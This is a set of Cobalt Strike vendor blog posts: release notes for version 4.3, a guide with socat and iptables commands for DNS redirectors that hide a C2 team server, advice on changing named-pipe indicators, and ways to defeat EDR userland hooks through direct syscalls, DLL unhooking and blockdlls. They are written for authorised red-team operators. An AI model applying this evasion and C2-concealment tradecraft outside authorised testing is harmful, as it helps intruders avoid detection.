SSL certificate verification failure

UPDATE: This has now been fixed. I’ve amended this post to reflect that.

If you ran the Cobalt Strike update program today, you may have seen an error message about the failed SSL certificate verification for www.cobaltstrike.com:

The update program pins the certificate for this server. When the certificate does not match what the update program expects, it gives a warning. This is by design, so that you can be confident that you’re getting the update from HelpSystems.

The change that caused the error has been reverted and the issue has been addressed. No further action is required on your part, and updates should now be working again.

We’d like to offer our sincere apologies for any inconvenience that this issue caused, and thank you for your patience while the issue was resolved.

Simple DNS Redirectors for Cobalt Strike

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques for creating UDP redirectors that protect Cobalt Strike team servers. Redirection is one of the recommended mechanisms for hiding Cobalt Strike team servers: it adds extra points of contact that a Beacon can use for instructions, as is commonly done with the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. A well-defined set of data clearly describes what constitutes a network connection (or flow). The state is explicit and can easily be determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections in user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).
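As a point of reference, a minimal TCP redirector for an HTTP listener can be a one-liner. The sketch below reuses the example hostname from later in this post; the fork and reuseaddr options let SOCAT service multiple concurrent connections:

# relay inbound HTTP C2 traffic to the hidden team server
socat tcp4-listen:80,fork,reuseaddr tcp4:teamserver.example.net:80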

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless, and keeping track of UDP “connections” requires second-guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in such a way that the team server sends its response back to the redirector, which then relays it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping traffic from a network port. Anyone can do it using netcat or an equivalent tool, and anyone with experience with these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector has these problems too, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump to the solution, we should look at the problems first. Let’s attempt a naive approach to a DNS channel redirector: run a straight SOCAT and launch a Beacon pointed at our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem is that SOCAT does not notice when a transaction is over, so it keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine-tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our redirector, which relays it to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.
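As a quick sanity check of that choice (reusing the example hostnames from above), measure the round trip to the team server and confirm that the chosen timeout comfortably exceeds it:

# measure the round-trip time between the redirector and the team server
ping -c 10 teamserver.example.net

# with an average RTT of a few milliseconds, a one second timeout leaves a generous margin
socat -T 1 udp4-listen:53,fork udp4:teamserver.example.net:53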

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request into two UDP packets, but this does not happen in practice. Be aware, though, that this risk always exists when doing UDP to TCP translations.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following on the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This wait is required for the protocol to operate properly in case some control messages are lost, and should not be removed. It is not a problem, though, because the number of allocated resources reaches an equilibrium. A few round trips after the activity goes down, the resource usage drops as well.
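If you want to watch this yourself, the socket counts are easy to pull on the redirector with ss (a quick sketch, using the same port as above):

# all TCP sockets involving the DNS-over-TCP port on the team server
ss -tan | grep -c ':9191'

# just the connections sitting in the TIME-WAIT state
ss -tan state time-wait | grep -c ':9191'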

Once we have this translation capability, we can build on it. With DNS carried over TCP connections, we can use other proxying utilities, like stunnel or SSH’s port forwarding, to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query itself. The response will be ignored, as it will come from a different DNS server.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, IPTABLES cannot convert from one protocol to another, as it works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

#enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

#Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address \
  --destination-port 53 -j MARK --set-mark 0x400

#For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp \
  -j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE
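After loading the rules, it is worth confirming that they are in place and that their packet counters increase as Beacon traffic arrives. A quick check:

# list the NAT rules along with their packet and byte counters
iptables -t nat -L PREROUTING -n -v
iptables -t nat -L POSTROUTING -n -v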

Looking at the values exposed in the proc filesystem, we see that we have 65,536 entries in the translation table (/proc/sys/net/netfilter/nf_conntrack_max) and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, lookups should be quick. These are default values and can easily be changed by writing a new number to the corresponding file, if necessary.
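For reference, here is a short sketch of how to read those limits, and raise the entry limit if a busy redirector ever approaches it:

# current connection tracking limits
cat /proc/sys/net/netfilter/nf_conntrack_max
cat /proc/sys/net/netfilter/nf_conntrack_buckets

# raise the maximum number of tracked connections, if needed
echo 131072 > /proc/sys/net/netfilter/nf_conntrack_max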

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.
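A simple way to collect these measurements during a test is a one-line sampling loop on the redirector:

# log the number of tracked connections once per second
while true; do echo "$(date +%T) $(cat /proc/sys/net/netfilter/nf_conntrack_count)"; sleep 1; done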

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the number of occupied conntrack slots stays below 10. If we switch to no delay, the value quickly grows to about 500, depending on the available throughput. When heavy activity is requested, the number of connection states steadily rises to 2,500 and plateaus at about 2,700. Once activity ceases, the conntrack entries decrease for around 90 seconds, at which point they have all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages, they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar to one another, the main difference being whether traffic is converted to TCP or not. UDP redirectors are the simplest, but TCP redirectors have the advantage that TCP connections are easier to encapsulate, which is useful in special cases, like when the traffic must be tunneled via SSH.

            Resource usage   Speed   Versatility   Ease of Use   Stability
SOCAT TCP   0                ++      +             0
SOCAT UDP   +                +       +             ++            +
IPTABLES    ++               ++      0             ++            ++

 

Raphael’s Transition

Friday was my last day at HelpSystems. I spent the day on the #Aggressor channel on Slack, put some final touches on a 12 month roadmap document, and worked with my colleagues to remove myself from a few systems I had originally designed. I had planned to get a blog post out yesterday, but the day ran right up to my dinner plans!

Cobalt Strike is in great shape. The product is no longer the efforts of one person. There’s a full research and development team behind it. Greg Darwin is the leader. You’ll see his announcements here and on the Cobalt Strike Technical Notes mailing list. Twitter announcements for Cobalt Strike will come from @CoreAdvisories as well.

You’ve seen the work of our R&D team. 4.3 was their release. I provided guidance, but they 100% carried it.

The team is filled with very senior software folks. All come from security backgrounds (one of our engineers was tech lead of HelpSystems’ server antivirus product). The forward mantra is to keep the product stable and to continue building more flexibility into the product’s attack chain.

The above team was three folks one week ago. A fourth engineer joined this week. And, we’re recruiting our hacker-in-residence as well. The hacker-in-residence will pick up some aspects of my role: input on the overall product direction, providing subject matter expertise on offense topics, and interacting with and helping all of us learn from you.

You have a bigger ally now. HelpSystems’ business strategy in this space is simple. As red teaming succeeds as a practice, we’ll succeed as a business. Cobalt Strike is in good hands.

I want to thank you for the opportunity to work with you for the past decade. It was the greatest privilege of my career. For me, the biggest thrill in this work wasn’t related to the technology. It was watching your careers, seeing your successes, and playing a small supporting role in it. Thanks for having me as part of it.

Cobalt Strike 4.3 – Command and CONTROL

Cobalt Strike 4.3 is now available. The bulk of the release involves updates to DNS processing but there are some other, smaller changes in there too.

DNS updates

We have added options to Malleable C2 to allow DNS traffic to be masked. A new dns-beacon block allows you to specify options to override the DNS subhost prefix used for different types of request. All existing options relating to DNS have also been moved inside this block. The affected options are: dns_idle, dns_max_txt, dns_sleep, dns_ttl, maxdns, dns_stager_prepend and dns_stager_subhost.

Be aware that with the addition of the dns-beacon block, these existing options must now be defined inside the block in order to be processed. Values set for these options outside of the dns-beacon block in existing profiles will be ignored.

dns-beacon {
    # Options moved into 'dns-beacon' group in 4.3:
    set dns_idle             "1.2.3.4";
    set dns_max_txt          "199";
    set dns_sleep            "1";
    set dns_ttl              "5";
    set maxdns               "200";
    set dns_stager_prepend   "doc-stg-prepend";
    set dns_stager_subhost   "doc-stg-sh.";
    
    # DNS subhost override options added in 4.3:
    set beacon               "doc.bc.";
    set get_A                "doc.1a.";
    set get_AAAA             "doc.4a.";
    set get_TXT              "doc.tx.";
    set put_metadata         "doc.md.";
    set put_output           "doc.po.";
    set ns_response          "zero";
}

Another change related to DNS is the addition of functionality to allow a DNS Beacon to egress using a specific DNS resolver, rather than the default DNS resolver for the target server. A new DNS Resolver field has been added to the DNS listener configuration dialog to facilitate this change.

Rounding out the DNS changes, a smaller addition is a customization option for how the server responds to NS record requests. We have noticed that some DNS resolvers inject unexpected NS record requests into the communications, which prevents the DNS Beacon from successfully egressing to its team server. Prior to this release, the team server would drop those NS requests, and if a resolver failed to receive responses to them, DNS communications would fail. To get around this issue, we have added another option (ns_response) to the new dns-beacon block to allow the response to those requests to be customized.

Host rotation

We have made improvements to evasion in the DNS and HTTP/S Beacons by adding a host rotation strategy option. Prior to this release, a close examination of DNS and HTTP/S traffic would reveal a round robin pattern of host processing. A new host rotation strategy option in the listener configurations for the DNS and HTTP/S Beacons allows you to use different strategies for rotating through hosts. The options include the existing round robin rotation plus three new options – random, rotate on failure, and rotate after a set period of time.

Quality-of-life updates

Outside of the main DNS theme of the release, we have made a couple of smaller, quality-of-life changes, the first of which is the addition of a PowerShell IEX option in Scripted Web Delivery. The new powershell IEX option outputs a shorter IEX command that can be pasted directly into a PowerShell console.

Another quality-of-life change is the option to prefix console messages with a timestamp. This option can be turned on or off via the console preferences dialog.

User agent handling

One final update to mention involves how requests from certain user agents are handled. Prior to this release, the default behaviour of the team server was to block requests from user agents starting with “curl”, “lynx” or “wget” with a 404 response. We have received feedback that this causes problems for some users who want their server to respond to traffic that appears to come from these user agents. To address this, we have added a block_useragents option to the http-config block within the Malleable C2 profile. This allows you to specify which user agents to respond to.
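If you want to check how your own team server behaves, a quick probe with curl (substituting your own hostname) shows whether a given user agent is being blocked; with the default behaviour described above, a blocked agent receives a 404:

# print only the HTTP status code returned for a curl user agent
curl -A "curl/7.68.0" -s -o /dev/null -w "%{http_code}\n" https://teamserver.example.net/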

To see a full list of what’s new in Cobalt Strike 4.3, please check out the release notes. Licensed users can run the update program to get the latest version. To purchase Cobalt Strike or ask about evaluation options, please contact us for more information.

Learn Pipe Fitting for all of your Offense Projects

Named pipes are a method of inter-process communication in Windows. They’re used primarily for local processes to communicate with each other. They can also facilitate communication between two processes on separate hosts. This traffic is encapsulated in the Microsoft SMB Protocol. If you ever hear someone refer to a named pipe transport as an SMB channel, this is why.

Cobalt Strike uses named pipes in several of its features. In this post, I’ll walk you through where Cobalt Strike uses named pipes, what the default pipenames are, and how to change them. I’ll also share some tips for avoiding named pipes in your Cobalt Strike attack chain.

Where does Cobalt Strike use named pipes?

Cobalt Strike’s default Artifact Kit EXEs and DLLs use named pipes to launder shellcode in a way that defeats antivirus binary emulation circa 2014. It’s still the default. When you see \\.\pipe\MSSE-###-server that’s likely the default Cobalt Strike Artifact Kit binaries. You can change this via the Artifact Kit. Look at src-common/bypass-pipe.c in the Artifact Kit to see the implementation.

Cobalt Strike also uses named pipes for its payload staging in the jump psexec_psh module for lateral movement. This pipename is \\.\pipe\status_##. You can change the pipe via Malleable C2 (set pipename_stager).

Cobalt Strike uses named pipes in its SMB Beacon communication. The product has had this feature since 2013. It’s pretty cool. You can change the pipename via your profile and when you configure an SMB Beacon payload. I’m also aware of a few detections that target the content of the SMB Beacon feature too. The SMB Beacon uses a [length][data] pattern and these IOCs target predictable [length] values at the beginning of the traffic. The smb_frame_header Malleable C2 option pushes back on this. The default pipe is \\[target]\pipe\msagent_##.

Cobalt Strike uses named pipes for its SSH sessions to chain to a parent Beacon. The SSH client in Cobalt Strike is essentially an SMB Beacon as far as Cobalt Strike is concerned. You can change the pipename (as of 4.2) by setting ssh_pipename in your profile. The default name of this pipe (CS 4.2 and later) is \\.\pipe\postex_ssh_####.

Cobalt Strike uses named pipes for most of its post-exploitation jobs. We use named pipes for post-ex tools that inject into an explicit process (screenshot, keylog). Our fork&run tools largely use named pipes to communicate results back to Beacon too. F-Secure’s Detecting Cobalt Strike Default Modules via Named Pipe Analysis discusses this aspect of Cobalt Strike’s named pipes. We introduced the ability to change these pipenames in Cobalt Strike 4.2. Set post-ex -> pipename in your Malleable C2 profile. The default name for these pipes is \\.\pipe\postex_#### in Cobalt Strike 4.2 and later. Prior to 4.2, the default name was random-ish.

Pipe Fitting with Cobalt Strike

With the above, you’re now armed with knowledge of where Cobalt Strike uses named pipes, and you’re empowered to change their default names. If you’re looking for a candidate pipename, use ls \\.\pipe from Beacon to quickly see a list of named pipes on a lived-in Windows system. This will give you plenty to choose from. When you set your plausible pipe names, be aware that each # character is replaced with a random character (0-9a-f). And, one last tip: you can specify a comma-separated list of candidate pipe names in your ssh_pipename and post-ex -> pipename profile values. Cobalt Strike will pick from this list, at random, when one of these values is needed.

Simplify your Offense Plumbing

Cobalt Strike uses named pipes in several parts of its offense chain. These are largely optional though and you can avoid them with some care. For example, the default Artifact Kit uses named pipes; but this is not a requirement of the Artifact Kit. Our other Artifact Kit templates do not use named pipes. For lateral movement and peer-to-peer chaining of Beacons, the TCP Beacon is an option. To avoid named pipes from our SSH sessions, tunnel an external SSH client via a SOCKS proxy pivot. And, while a lot of our fork&run post-exploitation DLLs use named pipes for results, Beacon Object Files are another way to build and run post-exploitation tools on top of Beacon. The Beacon Object Files mechanism does not use named pipes.

Closing Thoughts

This post focused on named pipe names, but the concepts here apply to the rest of Cobalt Strike as well. In offense, knowing your IOCs and how to change or avoid them is key to success. Our goal with Cobalt Strike isn’t amazing and ever-changing default pipe names or IOCs. Our goal is flexibility. Our current and future work is to give you more control over your attack chain over time. To know today’s options, read Kits, Profiles, and Scripts… Oh my! This blog post summarizes ways to customize Cobalt Strike. Our late-2019 Red Team Operations with Cobalt Strike mixes these ideas into each lecture as well.

Pushing back on userland hooks with Cobalt Strike

When I think about defense in the current era, I think of it as a game of instrumentation and telemetry. A well-instrumented endpoint provides a defense team and an automated security solution with the potential to react to or have visibility into a lot of events on a system. I say a lot, because certainly some actions are not easy to see [or practical to work with] via today’s instrumentation methods.

A popular method to instrument Windows endpoints is userland hooking. The process for this instrumentation looks like this:

(a) load a security product DLL into the process space [on process start, before the process starts to do anything]

(b) from the product DLL: install hooks into certain APIs of interest. There are a lot of different ways to hook, but one of the most common is to patch the first instructions of a function of interest to jump to the vendor’s code, do the analysis, execute the patched-over instructions, and resume the function just after the patch.

This method of instrumentation is popular because it’s easy-ish to implement, well understood, and was best practice in security products for a very long time. It’s still common in a lot of security technologies today.

The downside of the above instrumentation method is that it’s also susceptible to tampering and attack by an adversary. The adversary’s code that lives in a process has the same rights and ability to examine and change code as the security product that installed itself there.

The above possibility is the impetus for this blog post. I’d like to walk you through a few strategies to subvert instrumentation implemented as userland hooks with the Cobalt Strike product.

Which products use hooks and what do they hook?

Each of these techniques does benefit from awareness of the endpoint security products in play and how [also, if] they use userland hooks to have visibility.  Devisha Rochlani did a lot of work to survey different products and document their hooks. Read the Anti-virus Artifacts papers for more on this.

To do target-specific leg work, consult Matt Hand’s Adventures in Dynamic Evasion. Matt discusses how to identify hooks in a customer’s environment right now and use that information to programmatically craft a tailored evasion strategy.

Avoid Hooks with Direct System Calls

One way to defeat userland hooks is to avoid them by making system calls directly from our code.

A direct syscall is made by populating registers with arguments and a syscall number that corresponds to an API exposed to userland by the operating system kernel. The system call is then invoked with the syscall instruction. NTDLL is largely thin wrappers around these kernel APIs and is a place some products insert their hooks. By making syscalls directly from our code, and not calling them via NTDLL (or an API that calls them via NTDLL), we avoid these hooks.

The value of this technique is that we deny a security product visibility into our actions via this means. The downside is we have to adapt our code to working with these APIs specifically.

If a security product isn’t using userland hooks, this technique provides no evasion value. If we use system calls for uninteresting (e.g., not hooked) actions, this technique likewise provides no evasion value.

Also, be aware that direct system calls (outside of specific contexts, like NTDLL) can be disabled process-by-process in Windows 10. This is the ProcessSystemCallDisablePolicy. If something can be disabled, I surmise it can also be monitored and used for detection purposes too. This leads to a familiar situation: a technique that provides evasion utility now can also provide detection opportunities later on. This is a truism with most things offense. Always keep it in mind when deciding whether or not to use a technique like this.

With the above out of the way, what are some opportunities to use system calls from Cobalt Strike’s Beacon?

One option is to use system calls in your EXE and DLL artifacts that run Cobalt Strike’s Beacon. The blog post Implementing Syscalls in the Cobalt Strike Artifact Kit walks through how to do this for Cobalt Strike’s EXEs and DLLs. The post’s author shared that VirtualAlloc, VirtualProtect, and CreateThread are calls some products hook to identify malicious activity. I’d also go further and say that if your artifact spawns a process and injects a payload into it, direct syscalls are a way to hide this behavior from some security stacks.

Another option is to use system calls within some of your Beacon post-exploitation activities. While Beacon doesn’t use direct system calls with any of its built-ins, you can define your own built-ins with Beacon Object Files. Cornelis de Plaa from Outflank authored Direct Syscalls from Beacon Object Files to demonstrate how to use Jackson T.‘s Syswhispers 1 (Syswhispers 2 just came out!) from Beacon Object Files. As a proof-of-concept, Cornelis released a Beacon Object File to restore plaintext credential caching in LSASS via an in-memory patch.

Building on the above, Alfie Champion used Outflank’s foundation and re-implemented Cobalt Strike’s shinject and shspawn as Beacon Object Files that use direct system calls. This provides a way to do process injection from Cobalt Strike, but evade detections that rely on userland hooks. The only thing that’s missing is some way for scripts to intercept Cobalt Strike’s built-in fork&run actions and override the built-in behaviors with a BOF. Hmmmmm.

Refresh DLLs to Remove Function Hooks

Another way to defeat userland hooks is to find hooks implemented as code patches and restore the functions to their original uninstrumented state. One way to do this is to find hooked DLLs in memory, read the original DLL from disk, and use that content to restore the mapped DLL to its unhooked state. This is DLL refreshing.

The simplest case of DLL refreshing is to act on NTDLL. NTDLL is a good candidate because it’s really easy to refresh. You don’t have to worry about relocations and alternate API sets. NTDLL is also a good candidate because it’s a target for security product hooks! The NTDLL functions are often the lowest-level API that other Windows APIs call from userland. A well-placed hook in NTDLL will grant visibility into all of the userland APIs that use it.

You can refresh NTDLL within a Cobalt Strike Beacon with a Beacon Object File. Riccardo Ancarani put together a proof-of-concept to do this. Compile the code and use inline-execute to run it.

If NTDLL is not enough, you can refresh all of the DLLs in your current process. This path has more peril though. The DLL refreshing implementation needs to account for relocations, apisets, and other stuff that makes the unhooked code on disk differ from the unhooked code in memory. Jeff Tang from Cylance’s Red Team undertook this daunting task in 2017 and released their Universal Unhooker (whitepaper).

I’ve put together a Beacon Object File implementation of Cylance’s Universal Unhooker. The script for this BOF adds an unhook alias to Beacon. Type unhook and Beacon will pass control to the unhooker code, let it do its thing, and then return control back to Beacon.

Both of these techniques are great options to clean your Beacon process space before you start into other offense activities.

While the above are Beacon Object Files and presume that your Beacon is already loaded, you may also find it’s worthwhile to implement DLL refreshing in your initial access artifact too. Like direct system calls, this is a way to defeat userland hooking visibility that could affect your agent loading or its initial communications.

Prevent Hooks via Windows Process Mitigations

So far, we’ve discussed ways to defeat hooks by either avoiding them or undoing them. It’s possible to prevent hooking altogether too.

I became interested in this approach, when I learned that Google Chrome takes many steps to prevent security products from loading into its process space. Google was tired of entertaining crash reports from poorly implemented endpoint security products and opted to fight back against this in their own code. I share Google’s concerns about allowing an endpoint security product to share space with my post-exploitation code. My reasons are different, but we’re very much aligned on this cause!

The above led me to experiment with the Windows 10 process mitigation policy, BinarySignaturePolicy. A process run with a BinarySignaturePolicy of MicrosoftSignedOnly will refuse to load any DLL not signed by Microsoft into that process space. This mitigation prevents some security products from loading their DLLs into the new process space.

I opted to use the above to implement blockdlls in Cobalt Strike 3.14. blockdlls is a session-prepping command to run processes with this flag set. The idea is that processes spawned by Beacon will be free to act with less scrutiny, in some situations.

There are caveats to blockdlls. The mitigation is a recent-ish Windows 10 addition. It doesn’t work on versions of Windows where this mitigation isn’t implemented. Duh! And, security vendors do have the option to get Microsoft to sign their DLLs via an attestation service offered by Microsoft. A few made this exact move after Cobalt Strike weaponized this mitigation in version 3.14.

For more information on this technique and its variations, read Adam Chester’s Protecting Your malware with blockdlls and ACG. It’s a great overview of the technique and also discusses variations of the same idea.

